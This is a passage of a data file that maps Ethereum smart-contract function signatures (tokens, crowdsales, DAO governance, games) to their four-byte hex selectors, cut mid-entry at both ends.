"0xbf34ea7d", "airDropTokens(address[],uint256)": "0x88185aad", "trackClick(address,address,address,address)": "0x983a95b2", "activateAdSlot()": "0x83fa87f2", "deactivateAdSlot()": "0x7dc6c3d9", "createAdSlot(string,uint256,uint256,uint256[])": "0x0c48ae9e", "activateLineItem()": "0x7d8be627", "deactivateLineItem()": "0xf04d4d55", "createLineItem(string,uint256,uint256,uint256,uint256[])": "0x29f20618", "DutchExchangeProxy(address)": "0xc1381ea3", "ADXProxy()": "0xfd87f2cb", "_isLowercaseLetter(bytes1)": "0xfe8a7458", "_updateLoveStory(bytes16,bytes32,bytes32,uint256,string)": "0x3ee788e1", "changeMaxLockDuration(uint256)": "0x3dc6e9b0", "changeLockCostPerHour(uint256)": "0x008ad306", "changeInitialCost(uint256)": "0x4c3bf0b5", "withdrawableAmountFor(address)": "0x1f461f0d", "withdrawableAmount()": "0x951303f5", "isIdValid(bytes16)": "0xf4d56a51", "isIdRegistered(bytes16)": "0xffa6ae80", "readLoveStory(bytes16)": "0xb23e35bf", "transferLoveStoryWithData(bytes16,bytes32,bytes32,uint256,string)": "0xa220a90e", "transferLoveStory(bytes16,bytes32,bytes32,uint256)": "0x92eaa642", "transferCost(bytes16,uint256)": "0xc822bd3d", "updateLoveStoryWithData(bytes16,bytes32,bytes32,string)": "0x69997696", "updateLoveStory(bytes16,bytes32,bytes32)": "0xeeb441a4", "createLoveStoryWithData(bytes16,bytes32,bytes32,uint256,string)": "0x30fd7696", "createLoveStory(bytes16,bytes32,bytes32,uint256)": "0x2ff4f24e", "createCost(uint256)": "0x925cbdd1", "checkMaintenanceTime()": "0x119e045b", "changeMaintenanceTime(uint256,uint256)": "0x4ef3f235", "FinishTokensale()": "0xe7d00518", "changePersonalMincap(uint256)": "0x900e1561", "changeSaleHardcap(uint256)": "0xea2028b7", "changeEndTime(uint64)": "0x7ca24d95", "changeStartTime(uint64)": "0x528fa135", "addIssue(uint256)": "0xd57c1ea2", "GCV()": "0xf39afaba", "H2CToken()": "0x74ec89cb", "defrosting()": "0x66d29324", "transferSoldTokens(address,uint256)": "0x0fab459c", "_validateTokensLimits(uint256)": "0xed319520", "endPreIco()": "0x341881e6", "startPreIco()": "0xc06d1272", "endPrivate()": "0x431993b9", "updateAfter(uint256)": "0xe06fa68e", "updatePeriodically(uint256)": "0x82428323", "setCreationCurator(address)": "0xe4c53f04", "createHeld(address,uint256)": "0xa9bc5db1", "CreationContract()": "0xc178a2d4", "takeTokensForBacking(address,uint256)": "0x5cedff32", "destroyOldCoins(address,uint256)": "0xdb36c2e5", "issueNewHeldCoins(address,uint256)": "0xdaa89fef", "issueNewCoins(address,uint256)": "0xb8621759", "JKToken()": "0xec0a12d3", "APPToken612()": "0x9cd84ead", "isValidTraderAddress(address)": "0xfaa51485", "getTrader(uint8)": "0xcb56e40b", "removeTrader(uint8)": "0xd2598c4c", "getFillVolumes(bool,bytes,uint256,uint256)": "0xc228bcc6", "trade(bool,bytes,uint256,uint256)": "0xe244054a", "isExpired(bytes)": "0xc1f18e38", "getAvailableVolume(bytes)": "0x0a2c0c65", "getProtocol()": "0xd16352af", "getDataLength()": "0x3da76788", "withdraw(address)": "0x51cff8d9", "getDeploymentReward()": "0x525b25b1", "getRewardDivisor()": "0xe9540395", "setDeploymentReward(uint256)": "0xe32e9f22", "setRewardDivisor(uint256)": "0x1632070c", "RewardOffer(address,address,bytes,uint256,uint256,uint128,uint256)": "0x943b0747", "withdrawFromChildDAO(uint256)": "0x29f1bff4", "Refund()": "0x5d268629", "checkVoteStatus()": "0xe45ebe93", "watchProposal(uint256)": "0xffb7bfba", "getProposalID()": "0x20768ee8", "getWasApprovedBeforeDeadline()": "0x350d141e", "PFOffer(address,address,bytes,uint256,uint256,uint128)": "0xb6ed9f15", "performInitialWithdrawal()": "0x14918f5e", "withdraw()": "0x3ccfd60b", "terminate()": "0x0c08bf88", "setDailyWithdrawLimit(uint128)": "0x6a7fc8b7", "setVotingDeadline(uint256)": "0xedfbf7b6", "sign()": "0x2ca15122", "getVotingDeadline()": "0x1f7b8622", "getInitialWithdrawalDone()": "0xd44f2d3d", "getIsContractValid()": "0xa00ce377", "getOriginalClient()": "0x72b75585", "getClient()": "0x59dc735c", "getDateOfSignature()": "0xb29ae23f", "getLastWithdrawal()": "0x0c0662a8", "getHashOfTheProposalDocument()": "0x43bf718e", "getContractor()": "0xb6cb405b", "getPayoutFreezePeriod()": "0x262c0b72", "getDailyWithdrawalLimit()": "0xd6b4ec12", "getMinDailyWithdrawalLimit()": "0x42d16748", "getInitialWithdrawal()": "0x60213b88", "getTotalCost()": "0x1bcad37a", "Offer(address,address,bytes,uint256,uint256,uint128,uint256)": "0x1adf2d1a", "ManagedAccount(address,bool)": "0x1fd96b69", "payOut(address,uint256)": "0x0221038a", "__callback(bytes,string)": "0xdaa283c8", "DTHPool(address,address,uint256,string,string,string)": "0xd9fe60f3", "getEther()": "0xde0ff7c5", "fixTokens()": "0xe49dcee9", "executeVote(uint256)": "0xf98a4eca", "setVoteIntention(uint256,bool,bool,string)": "0x4da74ee6", "undelegateDAOTokens(uint256)": "0xe417291b", "delegateDAOTokens(uint256)": "0x8bfc2f33", "proposals(uint256)": "0x013cf08b", "sendValues()": "0xbe2430fe", "DAOTokenCreationProxyTransferer(address,address)": "0xebae35a6", "createDAO(address,uint256,uint256,uint256,string,string,uint8)": "0xd92ebe46", "createNewDAO(address)": "0xd21b84ac", "minQuorum(uint256)": "0xf42ac1de", "actualBalance()": "0x39d1f908", "isRecipientAllowed(address)": "0x8400c307", "transferPaidOut(address,address,uint256)": "0x48027610", "closeProposal(uint256)": "0x0386a016", "unblockMe()": "0x2632bf20", "isBlocked(address)": "0xfbac3951", "getNewDAOAddress(uint256)": "0xbe7c29c1", "numberOfProposals()": "0x8d7af473", "halveMinQuorum()": "0x78524b2e", "transferFromWithoutReward(address,address,uint256)": "0xdbde1988", "transferWithoutReward(address,uint256)": "0x4e10c3ee", "withdrawRewardFor(address)": "0x8a00a82f", "getMyReward()": "0xcc9ae3f6", "retrieveDAOReward(bool)": "0xa1da2fb9", "changeProposalDeposit(uint256)": "0xe33734fd", "changeAllowedRecipients(address,bool)": "0x749f9889", "newContract(address)": "0x6837ff1e", "splitDAO(uint256,address)": "0x82661dc4", "executeProposal(uint256,bytes)": "0x237e9492", "vote(uint256,bool)": "0xc9d27afe", "checkProposalCode(uint256,address,uint256,bytes)": "0xeceb2945", "newProposal(address,uint256,string,bytes,uint256,bool)": "0x612e45a3", "receiveEther()": "0xa3912ec8", "isCancellable()": "0x4500054f", "FutureBlockCall(address,uint256,uint8,address,bytes,bytes,uint256,uint256,uint16,uint256,uint256)": "0x0cb749b6", "execute()": "0x61461954", "checkExecutionAuthorization(address,uint256)": "0x24032866", "claim()": "0x4e71d92d", "registerData()": "0xb0f07e44", "getClaimAmountForBlock()": "0x4f059a43", "isCancelled()": "0x95ee1221", "wasCalled()": "0xc6803622", "wasSuccessful()": "0x09241200", "claimerDeposit()": "0x3233c686", "claimAmount()": "0x830953ab", "claimer()": "0xd379be23", "requiredStackDepth()": "0x2f95b833", "requiredGas()": "0x974654f4", "anchorGasPrice()": "0x37f4c00e", "callValue()": "0xd62457f6", "callData()": "0x4e417a98", "getNextCallSibling(address)": "0x48107843", "getNextCall(uint256)": "0x9f927be7", "abiSignature()": "0xca94692d", "scheduleCall(address,bytes,bytes,uint16,uint8,uint256[5])": "0x38eee93e", "contractAddress()": "0xf6b4dfb4", "scheduleCall(bytes,bytes,uint16,uint8,uint256,uint256,uint256,uint256,uint256)": "0xd13d1ace", "getExtraGas()": "0x137c638b", "scheduleCall(address,bytes,bytes,uint256,uint256,uint8,uint256)": "0x991ffd4e", "getOverhead()": "0x67ce940d", "getMintLimit(address)": "0x27a3fe41", "getMintApproval(address)": "0x993c78fa", "decreaseMintApproval(address,uint256)": "0x1b0a68f2", "increaseMintApproval(address,uint256)": "0x359fe780", "_decreaseMintApprovalAfterMint(address,uint256)": "0x2fab662a", "mintWithData(address,uint256,bytes)": "0x96adfe42", "batchMintWithData(address[],uint256[],bytes)": "0x2863cd7e", "transferZTXOwnership(address,address)": "0x978414bd", "TokenRUSD(uint256,string,uint8,string)": "0xeb4f54b2", "setPerventValue(uint256)": "0x802b8453", "setMinAmountSale(uint256)": "0xd6f35eb4", "setMinAmount4Round(uint256)": "0xd26cfeae", "setMinAmount3Round(uint256)": "0x0ec843d1", "setMinAmount2Round(uint256)": "0xbc35c57f", "setMinAmount1Round(uint256)": "0xed3b4eca", "setBonusSale(uint256)": "0xf4d2cac3", "setBonusRound4(uint256)": "0xe253dd6b", "setBonusRound3(uint256)": "0x00d9694c", "setBonusRound2(uint256)": "0xe0412a54", "setBonusRound1(uint256)": "0x90171e57", "setSaleFinishTime(uint256)": "0xc203d77f", "set4RoundTime(uint256)": "0x3377f212", "set3RoundTime(uint256)": "0xe4f7a076", "set2RoundTime(uint256)": "0xe960127e", "set1RoundTime(uint256)": "0x555befa8", "erc20KGS(uint8)": "0x74ac5bb4", "delAllowContractList(address)": "0x07b39962", "addAllowContractList(address)": "0x52ffff99", "setTransContractLocked(bool)": "0x532399d9", "setFeeLocked(bool)": "0xeb3b0ab3", "delBlackList(address)": "0x217987ad", "setGGEFee(uint8)": "0x47c1b5cf", "setGGCFee(uint8)": "0x05940728", "setGGEAddress(address)": "0x69bc513a", "setGGCAddress(address)": "0x80f3f094", "feesCal(address,uint256)": "0xa109b8bd", "AssignGGCOwner(address)": "0x986e7ed3", "Decline(address)": "0x46055acd", "Approve(address,uint256)": "0x90ec57f1", "Request(address,uint256)": "0xe31c60e3", "offerAsSacrificeFromVault(address)": "0xfc04c62e", "offerAsSacrifice(address)": "0x680478b1", "changevanity(string,address)": "0x6b3ffb91", "Payoutnextrefund()": "0xd988a0f9", "DonateToLosers()": "0x04c2a0ae", "DivsToRefundpot()": "0x820776de", "Expand(address)": "0x64864ca6", "Refundlineinfo()": "0x25b901c8", "checkstatus()": "0x7764d878", "jackpotinfo()": "0x413bac7a", "currentstagedata()": "0x0ad6aa28", "previousstagedata()": "0x0356948e", "setTickerSymbol(string)": "0xbf8d5df8", "multipleTokensSend(address[],uint256[])": "0xd7fe270e", "withdraw(string,address,uint256,string)": "0x79662bd5", "deposit(string,address,uint256,string)": "0x5d586bfd", "approveForwardedAccount(address,address,string)": "0xe6562fe1", "getFxUSDAmount(string,uint256)": "0xf2de12fc", "setFxBpsRate(string,uint256,string)": "0x44890014", "getAccountSpendingLimit(address)": "0x61e7662b", "getAccountSpendingRemaining(address)": "0x29db8ec4", "setAccountSpendingLimit(address,uint256,string)": "0x8a8f1f25", "approveKYCAndDeposit(string,address,uint256,uint256,string)": "0x28e53bb2", "approveKYC(address,bool,uint256,string)": "0x46e06634", "freezeAccount(address,bool,string)": "0xe354a3f2", "getTokenSupply(string)": "0xa0776a59", "getTokenBalance(string,address)": "0x3cdb9762", "_adjustDifficulty()": "0x389db4f1", "_reward_masternode()": "0xabb41fab", "_hash(uint256,bytes32)": "0x7c9143c9", "_newEpoch(uint256)": "0xf8570b01", "contractProgress()": "0x7558d81e", "masternodeInfo(uint256)": "0xeae445ed", "_emergencyLoop()": "0x14dfad27", "_arrangeMasternodeFlow()": "0x2730e4a2", "setBaseRewards(uint256,uint256)": "0x761a832f", "calculateRewardStructures()": "0x8f88a00e", "belongsToUser(address)": "0xc325ae4e", "getFollowingCandidate()": "0xbd8a79d5", "setMasternodeCandidate()": "0xbb8bedc9", "removeFromUserCounter(uint256)": "0x5faeced2", "isPartOf(uint256)": "0x10cb5628", "updateMasternode(uint256)": "0x3a74c05b", "closeGenesis()": "0x55e97e93", "addGenesis(address,bool)": "0x372210d1", "withdrawCollateral(address,uint256)": "0x350c35e9", "depositCollateral(address,uint256)": "0xa5d5db0c", "getTokenDetails(address)": "0x88aa8bee", "listAcceptedTokens()": "0x8843c1ba", "getAcceptedTokenAmount(address)": "0xb8d74f4b", "addOwnToken()": "0x493953de", "receivedFunds()": "0xab96cc4c", "buyMasternode()": "0x16c85710", "majorityForTeam()": "0xdaa0ab0e", "reachedMajorityForTeam(uint256)": "0x91fb4583", "majority()": "0xb6e54bdf", "reachedMajority(uint256)": "0x9601065d", "becomeVoter()": "0x63d494ea", "pastProposalTimeRules()": "0x9b598caf", "getTokenProposalDetails(uint256)": "0x5a43fa90", "stox()": "0x30f7cf80", "endOfDay()": "0x1bf5f736", "swapStorage()": "0x5fd65f0f", "Ownables()": "0x6a993130", "PRICE_8()": "0x132e63ba", "NUMBER_OF_COUNTRIES()": "0x595b35d1", "lastDay()": "0x6b0c932d", "product3_sell()": "0x39d34323", "getTotalNumberOfTransactions()": "0xcb47abc7", "founder4Wallet()": "0x60fb4aa0", "allFrozenTime()": "0xc715533e", "devTeam()": "0xd3dcc175", "specWallet()": "0xbfd0a553", "raisedEthAmt()": "0x37b8cade", "SaleEDUSupply()": "0x8224ca2b", "CONTRACT_ALLOWANCE()": "0x021e7f85", "roundNumber()": "0x4e2786fb", "CURRENTLY_ISSUED()": "0x43226631", "MAX_ALLOWED_TOTAL()": "0xd269ae55", "START_DATE()": "0x372c6533", "mintLimit()": "0x996517cf", "lastPlayTimestamp()": "0x74573f80", "ethWallet()": "0x09094f7a", "unfinalize()": "0xc0b39e68", "availablePreICO()": "0x88519ea4", "claimSignerAddress()": "0x0b6fc163", "contractCreatedTimestamp()": "0x3c3deb54", "lastPayerOverflow()": "0x879206a2", "EMISSION_FOR_PRESALE()": "0x8a5651e3", "isContributorsRewarded()": "0x9bb5c96c", "content()": "0x8a4d5a67", "withdrawRemainingIPCToken()": "0x550e4f2b", "saleStopTimestamp()": "0x1e2def3a", "currentBankroll()": "0x9741efe4", "TOKEN_RATE_40_PERCENT_BONUS()": "0x199676c7", "ownerCtuContract()": "0xd831a158", "getCountHolder()": "0x06e53e5c", "RuneToken()": "0xef52b0dc", "nextSaleAgent()": "0xde38460b", "stdlib()": "0xad4cd0d6", "latestTokenBalance()": "0x5a6cd237", "totalTokensCompany()": "0x4d597b2d", "thirdExtendedBonusSalesEnds()": "0x79f1987d", "paidAmount()": "0x12fa769f", "preSoldTokens()": "0x07d20edc", "CHF_CENT_PER_TOKEN()": "0x2ff420ef", "neverPauseAgain()": "0x6348eae6", "endICOs()": "0xbe099e7d", "TOKEN_RATE_PRESALE()": "0x3d820a90", "SWAP_LENGTH()": "0x351b68db", "getTotalStake()": "0x7bc74225", "rewardReductionRate()": "0xcdd13673", "tierThreePurchase()": "0x2b3c7562", "withdrawTeamTokens()": "0x953b7ef8", "AUTH_REMOVEOWNER()": "0x2c854d13", "CRAWDSALE_END_DAY()": "0x577a75a0", "whiteLister()": "0xef26e41d", "initialCardPrice()": "0xba0bc2f4", "getCurrentGameSteps()": "0x017e322c", "freezeQuorumPercent()": "0x9496df3f", "icoStartP1()": "0xfb0720dc", "maxNumbPerSubscr()": "0x23525826", "nodesVars()": "0x0a898428", "PUBLIC_RESOLVER_NODE()": "0x3f82e2c6", "midgradeOpen()": "0x0d14ed4f", "enableSell()": "0x5f56315b", "minInvestedCap()": "0xdccbfa2a", "e93Contract()": "0x2d014833", "snailmasterReq()": "0x8574ddf9", "baseURI()": "0x6c0360eb", "lastRewardTo()": "0x6fd396d6", "largestStake()": "0x4c8cab79", "secondStageStartsAt()": "0x5eee006a", "TAIL_EMISSION()": "0xa2e23a51", "feeReplyThread()": "0x8783d407", "testDeadChickenCnt()": "0x123f513c", "hyip()": "0x90f8c118", "EthCapInWei()": "0xa7e53987", "unpaid()": "0xc4cb291e", "SMILO_COMMUNITY_AMOUNT()": "0x8a0cc3c6", "supplylimitset()": "0x327efb0c", "initambassadors_()": "0x7b9940b6", "whitelistTokens()": "0x108caf79", "currentTotalSupply2()": "0x885a3b75", "saleExchangeRate()": "0x2b12553b", "icoSmartcontract()": "0x539b9648", "PRIVATE_STAGE_START()": "0x85b688de", "totalPurchases()": "0x5962a941", "CROWDSALE_HARDCAP()": "0x2dddd8e0", "Allow_Entries()": "0x429838e0", "AMBASSADOR_STAKE()": "0x0a5a4e17", "AirdropReward()": "0x8278fcea", "owlToken()": "0xcd94a2a4", "allocationFinished()": "0xe91e10af", "mainICOEndTime()": "0xa8c2c4a7", "punterAddress()": "0x14ff5f99", "numberOfFriends()": "0xc20ec5dc", "sellComissionUnits()": "0x103e8154", "etlContract()": "0x33739483", "totalavl()": "0x1fe1b208", "distributeFAITH(address[],uint256,uint256)": "0xa065a2bf", "getEthBalance(address)": "0x4d2301cc", "YORITEX()": "0x9efc0190", "divX(uint256,uint256)": "0x98dc6ae2", "mulX(uint256,uint256)": "0x2d3cb6bd", "claimContractTokens(address)": "0x5a9bb087", "airdropTesterFinal(address[],uint256)": "0x85ee292c", "TAKLIMAKAN()": "0x19220c69", "ZOB()": "0x8b31aaca", "initialize(address,address,address,address,address)": "0x1459457a", "ethToTokenRate()": "0xe09adc70", "tokenToEthRate()": "0x53d99c2a", "tokenToEth(uint256)": "0x70b2a30f", "getReturn(address,address,uint256)": "0x1e1401f8", "BurnCoin()": "0x7bfbfecb", "turn_flag_OFF()": "0x82cfd1e0", "turn_flag_ON()": "0xcbb9818c", "freeze(address,bool)": "0xbf120ae5", "FuBi()": "0xd2a1e045", "T20coin()": "0x5a353f98", "BitShopperToken()": "0xa103983c", "lockAttemp()": "0x2348f1ee", "setTgeAddr(address)": "0xf14be97f", "TgeProxy()": "0xedc94527", "transferBatch(address[],uint256)": "0x806e085e", "setLock(bool)": "0x619d5194", "setEndtDate(uint256)": "0x739cb57d", "setStartDate(uint256)": "0x82d95df5", "SBGCrowdsale()": "0x9c9e2752", "UVPToken()": "0xdbaea636", "EquitySharingSystem()": "0x631dc853", "UTCT()": "0xf236e2fb", "replaceManager(address)": "0x23447982", "isAtLeast(uint256,uint256)": "0xa6bdcc17", "isGreaterThan(uint256,uint256)": "0xdcf6a592", "isAtMost(uint256,uint256)": "0x0578e3e5", "isLessThan(uint256,uint256)": "0xe9970b6c", "divideSafely(uint256,uint256)": "0x5d63b77c", "dividedBy(uint256,uint256)": "0xe39bbf68", "LunchMoney()": "0xf127e53c", "cancelTransferRight(address)": "0x566038fb", "grantTransferRight(address)": "0x7627c9ad", "DigitizeCoin()": "0xb40b234e", "computeSellPrice()": "0xce90203c", "sellAllCookies()": "0x74c90d0d", "updatePlayersCookie(address)": "0xaa79376e", "balanceOfUnclaimedCookie(address)": "0x4c611268", "balanceOfTotalUnclaimedCookie()": "0x8db23385", "handleProductionDecrease(address,uint256)": "0x7f7de185", "handleProductionIncrease(address,uint256)": "0x2c3ca924", "productionUnitTokenContractCount()": "0x9a6fb6df", "createProductionUnitTokenContract(uint8,uint8,uint8,uint256,uint256,uint256,uint256)": "0x41d15b54", "createProductionUnit7()": "0xe8c93aa9", "createProductionUnit6()": "0xeef5a499", "createProductionUnit5()": "0x362ec5e2", "createProductionUnit4()": "0xb1c62e8a", "createProductionUnit3()": "0xd0b02abc", "createProductionUnit2()": "0x3f7b6be8", "createProductionUnit1()": "0x836b680f", "MoonInc()": "0x617ee3a7", "addLastTwoAmbassadors(address,address)": "0x8ce2e0ea", "ProductionUnitToken(address,uint8,uint8,uint8,uint256,uint256,uint256,uint256)": "0x6c8e44c3", "SzeToken(address,address)": "0xd8f42fca", "TiValueToken()": "0x13737db2", "flushEth()": "0x1d4233b9", "destroyBeneficiary(address)": "0x9742d64a", "addBeneficiary(address,uint256,uint256,uint256,uint256,bool)": "0xbdcab795", "releaseTo(address)": "0xd1fb5646", "MultiVesting(address)": "0x8346d3c6", "withdrawATokens(address)": "0x4845d40c", "stopIco()": "0x7b274afc", "AnimatixToken()": "0x2a5da7cd", "claimWinnings()": "0xb401faf1", "getCurrentData()": "0x770b5414", "getPayoutRoundId()": "0xf26fb705", "getBlocksToNextRound()": "0xdb9311c2", "changeNewRoundDelay(uint256)": "0x8c4af723", "getRoundId()": "0xf57ee77b", "TheRichestWins()": "0x824be3c7", "isTeamMember(address)": "0xbbe9f99d", "inAllocationLockPeriod()": "0xcaabe889", "isAllocationLocked(address)": "0x0fb7657f", "autoDistribute()": "0xa8f11eb9", "setDistributeAmount(uint256)": "0xd39b1d48", "collectTokens(address[],uint256[])": "0xf0dc4171", "MYJ256()": "0x89eb4fee", "HarlleriumCoin()": "0xd7c4e7ac", "ownerBurnToken(uint256)": "0x90762a8b", "getCoinAge(address,address,uint256)": "0x69dceb6a", "getProofOfStakeReward(address,address)": "0x4033236e", "annualInterest()": "0xb2552fc4", "coinAge()": "0x1e1b13c0", "AECloudToken()": "0xc9b06a4b", "userToNumCities(bytes32)": "0x476d7c13", "userToNumTowns(bytes32)": "0xd73478f8", "userToNumVillages(bytes32)": "0xaf259886", "addressToNumCities(address)": "0x0fd56202", "addressToNumTowns(address)": "0xcaaa2045", "addressToNumVillages(address)": "0x073b3bf9", "getGrapesToBuildWinery()": "0xaba47d1a", "getDelay()": "0xcebc9a82", "setDelay(uint256)": "0xe177246e", "Etherep(address,uint256,address,uint256)": "0xe067ea46", "setDebug(bool)": "0x0c2cb820", "getDebug()": "0xd184935d", "reset(address)": "0x6b8ab97d", "add(address,int256)": "0x5cd60dad", "set(address,int256,uint256)": "0x7223cd19", "RatingStore(address,address)": "0xf0fb4372", "setPurchaseRate(uint256)": "0x1d37c8a6", "tokenDrain()": "0x618407e5", "determinePurchase()": "0xe19fd3c5", "adjustDollarToEtherRatio(uint256)": "0x255e2f81", "adjustDuration(uint256)": "0x94465bf6", "numberOfBackers()": "0x0dbd5270", "prepareRefund()": "0x4e3b33d4", "advanceStep()": "0x3cac38e4", "returnWebsiteData()": "0x13b5d420", "FomoToken()": "0xa11f8de4", "Cointum(address,address,address,uint256,uint256,uint256)": "0xf82e4a4f", "approveAndCallcode(address,uint256,bytes)": "0xb11c4fd8", "getSpecifiedComment(address,uint256)": "0x982c0455", "getLastComment(address)": "0x6811444a", "approveProxy(address,address,uint256,uint8,bytes32,bytes32,string)": "0xe653d52d", "transferProxy(address,address,uint256,uint256,uint8,bytes32,bytes32,string)": "0xf8c4892f", "transferFromWithComment(address,address,uint256,string)": "0xb6c1cb03", "transferWithComment(address,uint256,string)": "0xe1d6aceb", "CNYTokenPlus(uint256,string,uint8,string)": "0x1fbee6ed", "getManyBalances(address[])": "0xea1642f8", "TigerCash()": "0x44720ed5", "BastetToken()": "0xeb03791b", "Albertheijn()": "0xd90c2861", "DPNToken(address,address)": "0x010bd255", "pauseUnpauseICO()": "0xd3aefeeb", "unpauseToken()": "0x50669a03", "extendDuration(uint256)": "0x8746656f", "getRateWithBonus()": "0xedf4a403", "processOfflinePurchase(address,uint256,int256)": "0x2a41360d", "changeFounderAddress(address)": "0x2272df67", "FoxTradingToken()": "0x3eb7dbc0", "_calcRemainReward()": "0xf7e5951e", "setLockJackpots(address)": "0x465af554", "rewardActivityEnd()": "0xfc1b9286", "_calcLockRewardPercentage()": "0xa2f1607c", "_lockToken(uint256)": "0x7934b50f", "increaseLockReward(uint256)": "0x6843aef9", "TosToken()": "0xb97d3627", "mint(address,address,uint256)": "0xc6c3bbe6", "StandardToken(address)": "0xd00408b7", "getPOOL_edit_34()": "0xa6dd06e1", "setPOOL_edit_34(string)": "0xd0d44cca", "getPOOL_edit_33()": "0x1fcd7ea6", "setPOOL_edit_33(string)": "0xb3d176c9", "getPOOL_edit_32()": "0x23ac3fd4", "setPOOL_edit_32(string)": "0xb53f4d94", "getPOOL_edit_31()": "0xf8bc8548", "setPOOL_edit_31(string)": "0x2699a7e7", "getPOOL_edit_30()": "0xacbfbaac", "setPOOL_edit_30(string)": "0x986bb99a", "getPOOL_edit_29()": "0xd4092dd2", "setPOOL_edit_29(string)": "0x575a7722", "getPOOL_edit_28()": "0xb2eed299", "setPOOL_edit_28(string)": "0xb39f4483", "getPOOL_edit_27()": "0x97463b75", "setPOOL_edit_27(string)": "0x911463d2", "getPOOL_edit_26()": "0x24516000", "setPOOL_edit_26(string)": "0x753f313f", "getPOOL_edit_25()": "0x07016f60", "setPOOL_edit_25(string)": "0x5073eda3", "getPOOL_edit_24()": "0xe7c12837", "setPOOL_edit_24(string)": "0x55326893", "getPOOL_edit_23()": "0xa66db704", "setPOOL_edit_23(string)": "0x8962aead", "getPOOL_edit_22()": "0xdb6f7537", "setPOOL_edit_22(string)": "0x705882f2", "getPOOL_edit_21()": "0xfa9a4c35", "setPOOL_edit_21(string)": "0xbdf27b50", "getPOOL_edit_20()": "0x30a35ce2", "setPOOL_edit_20(string)": "0xf635d160", "getPOOL_edit_19()": "0x9938be42", "setPOOL_edit_19(string)": "0x2fc52220", "getPOOL_edit_18()": "0xcb227cae", "setPOOL_edit_18(string)": "0x1b9d1bed", "getPOOL_edit_17()": "0xbfdd1a20", "setPOOL_edit_17(string)": "0x6c51af67", "getPOOL_edit_16()": "0xbea70578", "setPOOL_edit_16(string)": "0x4dd5df8c", "getPOOL_edit_15()": "0x6741953e", "setPOOL_edit_15(string)": "0xaeb58dc5", "getPOOL_edit_14()": "0xd23376ec", "setPOOL_edit_14(string)": "0xa7f18b5a", "getPOOL_edit_13()": "0xb3d14775", "setPOOL_edit_13(string)": "0xb03b3a0a", "getPOOL_edit_12()": "0xa0c42ed1", "setPOOL_edit_12(string)": "0x6c9a1e2a", "getPOOL_edit_11()": "0x9d0df9b5", "setPOOL_edit_11(string)": "0xec78626f", "getPOOL_edit_10()": "0x1528f43c", "setPOOL_edit_10(string)": "0xdeee9adb", "getPOOL_edit_9()": "0xd6dbf1c2", "modifyGovtAccount(address)": "0xb7c8699d", "modifyTaxRate(uint256)": "0x744f5f1a", "modifyLocality(string)": "0xb7abf606", "LocalToken(uint256,uint256,string,string,string,address,address,address)": "0xe8c9f9de", "Elsevier(uint256,uint256)": "0x6fc351c2", "JointToken()": "0xb01e8308", "Neptun()": "0x6dd3a823", "calculateBoardScore(uint256)": "0xd6714924", "getAdjacentCells(uint8)": "0x5be0497e", "getBoardSingleSpaceDetails(uint256,uint8,uint8)": "0x1c4b8659", "getBoardRowDetails(uint256,uint8)": "0xa4ea471f", "addStoneToBoard(uint256,uint8,uint8)": "0x0561eff6", "claimActingPlayerOutOfTime(uint256)": "0xcde7da75", "resignFromMatch(uint256)": "0xf87876c5", "passTurn(uint256)": "0x1a5375e1", "checkVictoryByScore(uint256)": "0x6be5f4a6", "getTimePeriodsUsed(uint256)": "0x31999749", "getOrCreateWaitingBoard(uint256)": "0x499e2c81", "createNewGoBoard(uint256)": "0x58b4c035", "getPlayerBoardsIDs(bool)": "0xa95055a8", "cancelMatch(uint256)": "0xd02c8cdf", "registerPlayerToBoard(uint256)": "0x3265bf5b", "getNextTurnColor(uint256)": "0xa5f4648c", "isPlayerOnBoard(uint256,address)": "0x3793ccb3", "getPlayerColor(uint256,address)": "0x4c1fbde8", "getBoardBalance(uint256)": "0x09da56c1", "getBoardUpdateTime(uint256)": "0xabacf5d7", "getCompletedGamesStatistics()": "0x2d0d9c2a", "getTotalNumberOfBoards()": "0xd327523a", "getShares()": "0xd73fe0aa", "updateGameTimes(uint256,uint8)": "0x32d72694", "setNewCFO(address)": "0x40c44f6a", "updateShares(uint256,uint256,uint256)": "0xcb61b42d", "updatePriceTier(uint8,uint256)": "0x8b4b8a26", "addPriceTier(uint256)": "0x24876434", "GoGlobals()": "0x82760c88", "LoanBit()": "0x1322311b", "Solarex()": "0xd1211a71", "x32323(uint32,string,uint8,string,address)": "0x8a1d8ae6", "XsearchToken()": "0xca219b16", "modifyFeeShare(uint256)": "0x29c71c1b", "modifyTransFee(uint256)": "0x0465832e", "UniversalToken(uint256,uint256,uint256)": "0x6a8d3575", "supplement(uint256)": "0x3aaf1898", "DIT()": "0x3188949a", "SACoin()": "0x3c8259b4", "setTime2Rest(uint256,uint256)": "0x633de6aa", "setCurrentAction(uint256,uint8)": "0x950311ab", "checkDragonStatus(uint256,uint8)": "0xe823fa20", "addDragonName(uint256,string)": "0x472457cb", "decraseTimeToAction(uint256)": "0x9419f17c", "killDragonDeathContract(address,uint256,uint256)": "0x0fe4ea72", "killDragon(uint256)": "0xfd5a60e1", "superDragon(uint256)": "0x605a42db", "matureDragon(uint256)": "0xe0470e02", "birthDragon(uint256)": "0x5fb0ac18", "changeDragonGen(uint256,uint256,uint8)": "0xa9b2ca9c", "createDragon(address,uint256,uint256,uint256,uint256,uint240)": "0x3f07618d", "mutagen2Face(uint256,uint256)": "0x2ce20579", "addSelctFight2Death(uint256,uint256,uint256)": "0xba4d573f", "addRandomFight2Death(uint256)": "0x51cb6ecd", "add2Auction(uint256,uint256,uint256,uint256,uint256)": "0x8a2bfdf2", "add2MarketPlace(uint256,uint256,uint256)": "0x0cef9a27", "setStageThirdBegin()": "0x8f7445e6", "changeAdultDragonStage(uint8)": "0xbda77531", "changeNeedFightToAdult(uint256)": "0x24d89171", "changeSecondsInBlock(uint256)": "0xd80d9c55", "changePriceChangeName(uint256)": "0x57f32591", "changePriceSelectFight2Death(uint256)": "0x0dfb0297", "changePriceRandomFight2Death(uint256)": "0x8527c3b0", "changePriceDecraseTime2Action(uint256)": "0xce3b0475", "changeSuperContract(address)": "0x97df8a50", "changeMutagen2FaceContract(address)": "0x4014c1c7", "changeRandomFight2DeathContract(address)": "0x5d088fc6", "changeSelectFight2DeathContract(address)": "0xba35c0be", "changeAuctionContract(address)": "0x4aeda70d", "changeDragonsStatsContract(address)": "0x63f5679e", "changeFMPcontractAddress(address)": "0x1180f83b", "changeGenRNGcontractAddress(address)": "0x0fda890e", "checkDragon(uint256)": "0x674106d8", "getDragonFight(uint256)": "0xc96266e8", "setDeathBlock(uint256)": "0xf5ef98ea", "incChildren(uint256)": "0x8dd66012", "setBirthBlock(uint256)": "0x8e056fe6", 